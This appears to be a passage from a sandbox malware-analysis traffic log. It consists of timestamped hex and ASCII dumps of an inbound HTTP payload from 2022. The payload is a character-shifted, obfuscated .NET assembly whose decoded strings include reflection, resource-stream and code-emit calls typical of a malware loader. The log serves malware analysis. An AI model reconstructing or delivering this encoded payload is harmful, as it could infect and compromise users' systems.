                                                                              2022-06-01 23:53:56 UTC1670INData Raw: f9 f8 20 0a f8 f8 fa f8 27 0a f8 f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 fe f8 78 07 f8 f8 ff f8 3f 07 f8 f8 f9 f8 43 0a f8 f8 fa f8 55 0a f8 f8 fb f8 8b 07 f8 18 fa f8 e1 f8 f8 18 f9 f8 29 f8 f8 f8 f9 f8 29 f8 08 08 fa f8 e1 f8 f8 f8 f9 f8 29 f8 f8 f8 fa f8 e1 f8 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 84 0a f8 f8 f9 f8 84 0a f8 f8 fa f8 78 07 f8 f8 fb f8 3f
                                                                              Data Ascii: 'x??F/7CJU/7CJUx?CU)))?F/7/7x??Fx?
                                                                              2022-06-01 23:53:56 UTC1672INData Raw: c0 fa 71 f8 f8 04 c0 fa 71 f8 ff 04 ca fa b9 f8 0b 04 d5 fa 11 f8 12 04 df fa 11 f8 22 04 e9 fa 11 f8 33 04 e9 fa 61 f9 49 04 e9 fa 79 f9 6b 04 f3 fa 79 f9 9c 04 ff fb 91 f9 c5 04 0b fb 99 f9 df 04 16 fb 91 f9 e3 04 21 fb 91 f9 e7 04 21 fb 91 f9 ef 04 21 fb 71 f8 f4 04 2b fb c9 f8 04 05 35 fb 99 f9 0b 05 3f fb a1 f9 2e 05 3f fb 99 f9 42 05 3f fb a9 f9 5c 05 48 fb 29 f8 0b fb 53 fb b1 f9 da 01 5e fb b1 f9 78 05 6a fb b1 f9 12 01 76 fb c9 f8 da 01 81 fb 79 f8 8c 05 8b fb 71 f8 9f 05 96 fb e1 f8 aa 05 a1 fb b9 f9 bc 05 ac fb 61 f8 c2 00 b5 fb 19 f9 cd 05 c5 fb 19 f9 e1 05 d2 fb c1 f9 06 06 de fb a1 f8 12 06 f4 fb c9 f8 da 01 07 fc c9 f8 da 01 11 fc c9 f8 04 05 1b fc e1 f8 48 06 25 fc 31 f9 59 06 2f fc b9 f9 cd 03 3b fc b9 f9 c1 03 3b fc 71 f8 73 06 46 fc a1
                                                                              Data Ascii: qq"3aIyky!!!q+5?.?B?\H)S^xjvyqaH%1Y/;;qsF
                                                                              2022-06-01 23:53:56 UTC1673INData Raw: f8 f8 f9 ff f9 4c 0b fa f8 74 5c f8 f8 2b f8 d0 5c f8 f8 2c f8 d8 5c f8 f8 2d f8 e1 5c f8 f8 2e f8 e6 5c f8 f8 2f f8 fe 5d f8 f8 30 f8 07 5d f8 f8 31 f8 0e 5d f8 f8 32 f8 39 5d f8 f8 33 f8 3f 7d f8 f8 34 f8 4f 7d f8 f8 35 f8 56 7e f8 f8 36 f8 6b 7e f8 f8 37 f8 71 7e f8 f8 38 f8 78 7e f8 f8 39 f8 a5 7e f8 f8 3a f8 8f 80 f8 f8 3c f8 6b 82 f8 f8 40 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 0c f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 66 f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 1c f8 f8 f8 f8 f8 02 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 c0 01 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 b7 02 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 83 04
                                                                              Data Ascii: Lt\+\,\-\.\/]0]1]29]3?}4O}5V~6k~7q~8x~9~:<k@f
                                                                              2022-06-01 23:53:56 UTC1674INData Raw: 17 f8 77 f8 ba 78 f8 ba 79 f8 ba 7a f8 ba 7b f8 ba 7c f8 ba 7e f8 ba 7f f8 ba 80 f8 ba 81 f8 ba 82 f8 ba 83 f8 ba 84 f8 ba 85 f8 ba 86 f8 ba 87 f8 ba 88 f8 ba 89 f8 ba 8a f8 ba 8b f8 ba 8c f8 ba 8d f8 ba 8e f8 ba 8f f8 ba 90 f8 ba 91 f8 ba 92 f8 ba 93 f8 ba 94 f8 ba 95 f8 ba 96 f8 ba 97 f8 f9 fa f8 fa fa f8 fb fa f8 fc fa f8 fd fa f8 fe fa f8 ff fa f8 00 fa f8 06 fa f8 07 fa f8 08 fa f8 09 fa f8 0a fa f8 0b fa f8 0c fa f8 0d fa f8 0e fa f8 0f fa f8 10 fa f8 11 fa f8 12 fa f8 13 fa f8 14 fa f8 15 fa f8 16 fa f8 17 fa f8 77 fa f8 ba 78 fa f8 ba 79 fa f8 ba 7a fa f8 ba 7b fa f8 3d 66 5b 67 5c 61 66 5f f8 4b 71 6b 6c 5d 65 26 4c 5d 70 6c f8 d9 7a 9b f8 61 c7 8a c1 9a c6 89 e7 b7 b5 f8 e1 80 97 ca 87 d2 b7 e1 80 7f ba a3 f8 bd 86 cd b3 d3 92 e7 b7 b5 e7 b7 b5
                                                                              Data Ascii: wxyz{|~wxyz{=f[g\af_Kqkl]e&L]plza
                                                                              2022-06-01 23:53:56 UTC1676INData Raw: 67 66 48 67 61 66 6c 5d 6a f8 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 3a 71 6c 5d 6b f8 76 17 f8 5f 5d 6c 57 4d 66 61 5b 67 5c 5d f8 5f 5d 6c 57 39 4b 3b 41 41 f8 5f 5d 6c 57 3c 5d 5e 59 6d 64 6c f8 5f 5d 6c 57 4d 4c 3e 30 f8 3f 5d 6c 3b 6d 6a 6a 5d 66 6c 48 6a 67 5b 5d 6b 6b f8 5f 5d 6c 57 45 59 61 66 45 67 5c 6d 64 5d f8 76 ba 7c f8 5f 5d 6c 57 3e 61 64 5d 46 59 65 5d f8 76 ba 7e f8 4c 67 4b 6c 6a 61 66 5f f8 76 ba 7f f8 5f 5d 6c 57 48 6a 67 5b 5d 6b 6b 46 59 65 5d f8 76 ba 80 f8 48 59 6c 60 f8 3b 67 65 5a 61 66 5d f8 3f 5d 6c 48 6a 67 5b 5d 6b 6b 5d 6b 3a 71 46 59 65 5d f8 45 61 5b 6a 67 6b 67 5e 6c 26 4e 61 6b 6d 59 64 3a 59 6b 61 5b f8 44 5d 66 f8 4c 67 41 66 6c 2b 2a f8 3f 5d 6c 3b 60 59 6a f8 3b 60 6a 4f f8 3d 66 6e 61 6a 67 66 65 5d 66 6c f8 3f 5d 6c
                                                                              Data Ascii: gfHgafl]j<]d]_Yl]?]l:ql]kv_]lWMfa[g\]_]lW9K;AA_]lW<]^Ymdl_]lWML>0?]l;mjj]flHjg[]kk_]lWEYafEg\md]v|_]lW>ad]FYe]v~LgKljaf_v_]lWHjg[]kkFYe]vHYl`;geZaf]?]lHjg[]kk]k:qFYe]Ea[jgkg^l&NakmYd:Yka[D]fLgAfl+*?]l;`Yj;`jO=fnajgfe]fl?]l
                                                                              2022-06-01 23:53:56 UTC1677INData Raw: f8 3b 67 65 68 59 6a 5d 4b 6c 6a 61 66 5f f8 ba 8d fa f8 ba 8e fa f8 ba 8f fa f8 4b 68 64 61 6c f8 ba 90 fa f8 76 ba 90 fa f8 5f 5d 6c 57 39 6b 6b 5d 65 5a 64 71 f8 ba 91 fa f8 76 ba 91 fa f8 3f 5d 6c 47 5a 62 5d 5b 6c f8 ba 92 fa f8 76 ba 92 fa f8 ba 93 fa f8 76 ba 93 fa f8 3f 5d 6c 3d 70 5d 5b 6d 6c 61 66 5f 39 6b 6b 5d 65 5a 64 71 f8 ba 94 fa f8 3f 5d 6c 45 59 66 61 5e 5d 6b 6c 4a 5d 6b 67 6d 6a 5b 5d 4b 6c 6a 5d 59 65 f8 ba 95 fa f8 76 ba 95 fa f8 ba 96 fa f8 4a 5d 59 5c f8 ba 97 fa f8 76 ba 97 fa f8 26 5b 5b 6c 67 6a f8 3a 3a f8 26 5b 6c 67 6a f8 e7 b7 b5 e7 b7 b5 c7 a9 e1 80 7f e7 b7 b5 f8 e7 b7 b5 e7 b7 b5 c6 7d e3 82 b3 c4 a6 f8 e7 b7 b5 d7 7a bb 9d bd ac ca 9a f8 d9 7a a0 f8 67 5a 62 5d 5b 6c f8 65 5d 6c 60 67 5c f8 59 f8 5a f8 3a 5d 5f 61 66 41
                                                                              Data Ascii: ;gehYj]Kljaf_Khdalv_]lW9kk]eZdqv?]lGZb][lvv?]l=p][mlaf_9kk]eZdq?]lEYfa^]klJ]kgmj[]Klj]YevJ]Y\v&[[lgj::&[lgj}zzgZb][le]l`g\YZ:]_afA
                                                                              2022-06-01 23:53:56 UTC1678INData Raw: 6c 5d 45 5d 65 5a 5d 6a 4a 5d 5e 6b 3c 5d 64 5d 5f 59 6c 5d 6b f8 6c 71 68 5d 41 3c f8 3b 6a 5d 59 6c 5d 3f 5d 6c 4b 6c 6a 61 66 5f 3c 5d 64 5d 5f 59 6c 5d f8 67 6f 66 5d 6a 4c 71 68 5d f8 e3 94 b0 c2 a2 bc 8b e7 b7 b5 d1 ad f8 bd 7e e7 7a b1 e7 b7 b5 d4 a2 cd 7c f8 d6 b0 ce 87 e7 b7 b5 e7 b7 b5 e7 b7 b5 f8 bb 8a ba a3 cf 81 e7 b6 a5 c2 8b f8 4d 66 6e 5d 6a 61 5e 61 59 5a 64 5d 3b 67 5c 5d 39 6c 6c 6a 61 5a 6d 6c 5d f8 4b 71 6b 6c 5d 65 26 4b 5d 5b 6d 6a 61 6c 71 f8 4c 59 6a 5f 5d 6c 3e 6a 59 65 5d 6f 67 6a 63 39 6c 6c 6a 61 5a 6d 6c 5d f8 4b 71 6b 6c 5d 65 26 4a 6d 66 6c 61 65 5d 26 4e 5d 6a 6b 61 67 66 61 66 5f f8 46 5d 6d 6c 6a 59 64 4a 5d 6b 67 6d 6a 5b 5d 6b 44 59 66 5f 6d 59 5f 5d 39 6c 6c 6a 61 5a 6d 6c 5d f8 4d 64 6c 61 65 59 6c 5d 4a 5d 6b 67 6d
                                                                              Data Ascii: l]E]eZ]jJ]^k<]d]_Yl]klqh]A<;j]Yl]?]lKljaf_<]d]_Yl]gof]jLqh]~z|Mfn]ja^aYZd];g\]9lljaZml]Kqkl]e&K][mjalqLYj_]l>jYe]ogjc9lljaZml]Kqkl]e&Jmflae]&N]jkagfaf_F]mljYdJ]kgmj[]kDYf_mY_]9lljaZml]MdlaeYl]J]kgm
                                                                              2022-06-01 23:53:56 UTC1680INData Raw: 5c 40 59 66 5c 64 5d f8 4a 6d 66 6c 61 65 5d 45 5d 6c 60 67 5c 40 59 66 5c 64 5d f8 3f 5d 6c 45 5d 6c 60 67 5c 3e 6a 67 65 40 59 66 5c 64 5d f8 5f 5d 6c 57 41 6b 4b 6c 59 6c 61 5b f8 5f 5d 6c 57 3e 61 5d 64 5c 4c 71 68 5d f8 3b 6a 5d 59 6c 5d 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 48 59 6a 59 65 5d 6c 5d 6a 6b f8 48 59 6a 59 65 5d 6c 5d 6a 41 66 5e 67 f8 5f 5d 6c 57 48 59 6a 59 65 5d 6c 5d 6a 4c 71 68 5d f8 5f 5d 6c 57 4a 5d 6c 6d 6a 66 4c 71 68 5d f8 3c 71 66 59 65 61 5b 45 5d 6c 60 67 5c f8 4b 71 6b 6c 5d 65 26 4a 5d 5e 64 5d 5b 6c 61 67 66 26 3d 65 61 6c f8 3f 5d 6c 41 44 3f 5d 66 5d 6a 59 6c 67 6a f8 41 44 3f 5d 66 5d 6a 59 6c 67 6a f8 47 68 3b 67 5c 5d 6b f8 44 5c 59 6a 5f 57 28 f8 47 68 3b 67 5c 5d f8 3d 65 61 6c f8 44 5c 59 6a 5f 57 29 f8 44 5c 59 6a
                                                                              Data Ascii: \@Yf\d]Jmflae]E]l`g\@Yf\d]?]lE]l`g\>jge@Yf\d]_]lWAkKlYla[_]lW>a]d\Lqh];j]Yl]<]d]_Yl]?]lHYjYe]l]jkHYjYe]l]jAf^g_]lWHYjYe]l]jLqh]_]lWJ]lmjfLqh]<qfYea[E]l`g\Kqkl]e&J]^d][lagf&=eal?]lAD?]f]jYlgjAD?]f]jYlgjGh;g\]kD\Yj_W(Gh;g\]=ealD\Yj_W)D\Yj
                                                                              2022-06-01 23:53:56 UTC1681INData Raw: 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28
                                                                              Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                              2022-06-01 23:53:56 UTC1682INData Raw: f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8
                                                                              Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                              2022-06-01 23:53:56 UTC1684INData Raw: 28 f8 28 f8 2e f8 3c f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2e f8 2c f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2d f8 2c f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2c f8 3b f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 2a f8 39 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2b f8 28 f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 39 f8 31 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2e f8 30 f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2f f8 31 f8 28 f8 28 f8 2f f8 28 f8 28 f8 28 f8 2e f8 3e f8 28 f8 28 f8 2c f8 2b
                                                                              Data Ascii: ((.<((.-((.,((.)((/*((-,((.;((.)((./((.-((,;((()((()((*9((((((+*((+*((+(((+*((*(((*(((91((*(((/,((.0((./((.1((/*((/1((/(((.>((,+
                                                                              2022-06-01 23:53:56 UTC1685INData Raw: f8 28 f8 2e f8 3e f8 28 f8 28 f8 2e f8 2e f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2c f8 31 f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2c f8 2e f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2d f8 2b f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 2d f8 3b f8 28 f8 2c f8 3a f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2e f8 3e f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2f f8 2b f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2d f8 2c f8
                                                                              Data Ascii: (.>((..((.=((,1((.-((.;((.1((,.((./((.=((.1((/*((/,((-+((()(((((*-;(,:(((((((((((((((.=((.>((.1((/,((.)((.;((/+((.=((.)((/*((-,
                                                                              2022-06-01 23:53:56 UTC1689INData Raw: 28 f8 28 f8 28 f8 2b f8 2b f8 2e f8 2c f8 2b f8 2e f8 2e f8 29 f8 2e f8 2e f8 2b f8 30 f8 2b f8 31 f8 2e f8 29 f8 2b f8 31 f8 2b f8 29 f8 2b f8 2e f8 2b f8 30 f8 2a f8 3c f8 2b f8 2a f8 2b f8 29 f8 2e f8 2a f8 2b f8 30 f8 2a f8 3c f8 2b f8 2e f8 2e f8 2b f8 2e f8 2e f8 2b f8 2c f8 2a f8 3c f8 2b f8 2b f8 2b f8 29 f8 2b f8 2b f8 2b f8 29 f8 2a f8 3c f8 2b f8 29 f8 2b f8 2d f8 2e f8 2b f8 2e f8 2c f8 2e f8 29 f8 2b f8 2c f8 2b f8 29 f8 2b f8 2e f8 2a f8 2c f8 28 f8 28 f8 28 f8 29 f8 2a f8 31 f8 28 f8 28 f8 28 f8 28 f8 2b f8 2a f8 2b f8 2a f8 2b f8 28 f8 2b f8 2a f8 2a f8 28 f8 2a f8 28 f8 39 f8 31 f8 3b f8 2a f8 2a f8 28 f8 2f f8 2c f8 2e f8 30 f8 2e f8 2f f8 2e f8 31 f8 2f f8 2a f8 2f f8 31 f8 2f f8 28 f8 2e f8 3e f8 2c f8 2b f8 29 f8 2a f8 28 f8 28 f8 28
                                                                              Data Ascii: (((++.,+..)..+0+1.)+1+)+.+0*<+*+).*+0*<+..+..+,*<+++)+++)*<+)+-.+.,.)+,+)+.*,((()*1((((+*+*+(+**(*(91;**(/,.0./.1/*/1/(.>,+)*(((
                                                                              2022-06-01 23:53:56 UTC1693INData Raw: f8 2f f8 2e f8 28 f8 28 f8 29 f8 3a f8 28 f8 28 f8 2a f8 3d f8 28 f8 28 f8 2d f8 2f f8 28 f8 28 f8 29 f8 2b f8 28 f8 28 f8 2a f8 3d f8 28 f8 28 f8 2c f8 3d f8 28 f8 28 f8 28 f8 3a f8 28 f8 28 f8 2a f8 3d f8 28 f8 28 f8 28 f8 2e f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 30 f8 29 f8 28 f8 28 f8 2b f8 31 f8 28 f8 2a f8 39 f8 3c f8 28 f8 28 f8 30 f8 31 f8 28 f8 28 f8 28 f8 2e f8 28 f8 28 f8 2c f8 2c f8 28 f8 28 f8 3a f8 29 f8 28 f8 28 f8 2b f8 2b f8 28 f8 2a f8 2a f8 30 f8 28 f8 28 f8 39 f8 29 f8 28 f8 28 f8 2a f8 3a f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 31 f8 29 f8 28 f8 28 f8 2a f8 2d f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 30 f8 31 f8 28 f8 28 f8 28 f8 2e f8 28 f8 2a f8 2a f8 3e f8 28 f8 28 f8 30 f8 31 f8 28 f8 28 f8 29 f8 28 f8 28 f8 2a f8 2a f8 3e f8 28 f8
                                                                              Data Ascii: /.(():((*=((-/(()+((*=((,=(((:((*=(((.(**>((0)((+1(*9<((01(((.((,,((:)((++(**0((9)((*:(**>((1)((*-(**>((01(((.(**>((01(()((**>(
                                                                              2022-06-01 23:53:56 UTC1697INData Raw: 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2c f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 30 f8 2c f8 2e f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2e f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 39 f8 28 f8 28 f8 28 f8 28 f8 2b f8 28 f8 28 f8 29 f8 28 f8 3a f8 2a f8 29 f8 28 f8 2a f8 28 f8 28 f8 3d f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 30 f8 39 f8 2b f8 3d f8 29 f8 3e f8 2b f8 3a f8 28 f8 28 f8 28 f8 2b f8 28 f8 29 f8 2c f8 3b f8 28 f8 28 f8 28 f8 28 f8 2c f8 2d f8 2d f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 2c f8 28 f8 39 f8 28 f8 3c
                                                                              Data Ascii: ((((((((,(((((((*(((((((*0,.(((((((((((((.(((((((9((((+(()(:*)(*((=(((((((((((((((((09+=)>+:(((+(),;((((,--(((((((((((((((*,(9(<
                                                                              2022-06-01 23:53:56 UTC1701INData Raw: 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 2b f8 6f f8 43 f8 39 f8 39 f8 39 f8 39 f8 3c f8 39 f8 39 f8 39 f8 41 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39
                                                                              Data Ascii: 9999999999999999999999999999999999999+oC9999<999A9999999999999999999999999999999999999999999999999999999999999999999999999999999
                                                                              2022-06-01 23:53:56 UTC1704INData Raw: 39 f8 41 f8 39 f8 66 f8 3d f8 39 f8 44 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 6d f8 3a f8 6f f8 5a f8 39 f8 63 f8 3f f8 39 f8 28 f8 3a f8 49 f8 51 f8 39 f8 6f f8 3f f8 39 f8 72 f8 3a f8 5f f8 5a f8 39 f8 3d f8 3f f8 39 f8 71 f8 3a f8 39 f8 4e f8 39 f8 39 f8 39 f8 39 f8 3d f8 39 f8 39 f8 42 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 6f f8 5a f8 39 f8 51 f8 3f f8 39 f8 6d f8 3a f8 49 f8 4b f8 39 f8 4d f8 3f f8 39 f8 6b f8 3a f8 49 f8 59 f8 39 f8 51 f8 3d f8 39 f8 71 f8 3a f8 49 f8 51 f8 39 f8 51 f8 3e f8 39 f8 3a f8 39 f8 39 f8 39 f8 39 f8 49 f8 3d f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 5f f8 39 f8 39 f8 39 f8 39 f8 39 f8 3d f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39
                                                                              Data Ascii: 9A9f=9D999999999m:oZ9c?9(:IQ9o?9r:_Z9=?9q:9N9999=99B999999oZ9Q?9m:IK9M?9k:IY9Q=9q:IQ9Q>9:9999I=9999999999999999999_99999=9999999
                                                                              2022-06-01 23:53:56 UTC1708INData Raw: f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 3d f8 3b f8 39 f8 6b f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 3d f8 39 f8 39 f8 39 f8 39 f8 5f f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 39 f8 3a f8 39 f8 39 f8 39 f8 39 f8 4b f8 39 f8 39 f8 59 f8 39 f8 49 f8 29 f8 39 f8 45 f8 40 f8 39 f8 6d f8 39 f8 39 f8 71 f8 39 f8 6b f8 3f f8 39 f8 6d f8 39 f8 5f f8 66 f8 39 f8 45 f8 3f f8 39 f8 6d f8 39 f8 39 f8 5f f8 39 f8 6b f8 3e f8 39 f8 6d f8 39 f8 39 f8 5f f8 39 f8 45 f8 3e f8 39 f8 6d f8 39 f8 5f f8 60 f8 39 f8 6b f8 3d f8 39 f8 6d f8 39 f8 49 f8 5a f8 39 f8 45 f8 3d f8 39 f8 6d f8 39 f8 39 f8 5f f8 39 f8 6b f8 3c f8 39 f8 6d f8 39 f8
                                                                              Data Ascii: 9999999999=;9k999999999999999=9999_999999999999999999:9999K99Y9I)9E@9m99q9k?9m9_f9E?9m99_9k>9m99_9E>9m9_`9k=9m9IZ9E=9m99_9k<9m9
                                                                              2022-06-01 23:53:56 UTC1712INData Raw: 09 78 b0 fc fe 09 78 9c fc fe 09 78 8c fc fe 09 78 a8 fc fe 09 78 bc fc fe 09 78 c4 fb fe 09 21 fb fe 15 fb fc fe 09 78 f0 ff fe 0d 0a 25 fa 00 06 fa fe 00 ff f8 fa f9 0a 2d 09 31 fc fe 0a 79 04 fb 18 f8 00 fc fe 0a 79 08 fc 18 f9 fb 00 fc fe 0a 79 0c fc f8 f9 fb fb fc fe 0a 79 10 fd f8 f9 f9 0a 2d fc fe 0a 79 14 fc f8 f8 0a 45 fc fe 0a 79 18 fe 18 f9 0a 49 15 fd fc fe 0a 79 1c fd 18 f9 0a 4d 06 fc fe 0a 79 20 fd 18 f9 0a 51 06 fc fe 0a 79 24 fe 18 fa 14 14 15 14 fc fe 0a 79 28 fc f8 f9 f9 00 fc fe 0a 79 2c fc f8 f9 fa 06 fc fe 0a 79 30 fd f8 f9 15 fd 06 fc fe 0a 79 34 fc 18 f9 f9 06 fc fe 0a 79 38 fd 18 f9 f9 09 69 fc fe 0a 79 3c fd f8 f9 06 15 06 fc fe 0a 79 40 fe f8 f9 0a 39 0a 65 fc fe 0a 79 44 00 f8 fc f9 15 fd 00 10 00 fc fe 0a 79 48 fe f8 f9 0a 4d
                                                                              Data Ascii: xxxxxx!x%-1yyyy-yEyIyMy Qy$y(y,y0y4y8iy<y@9eyDyHM
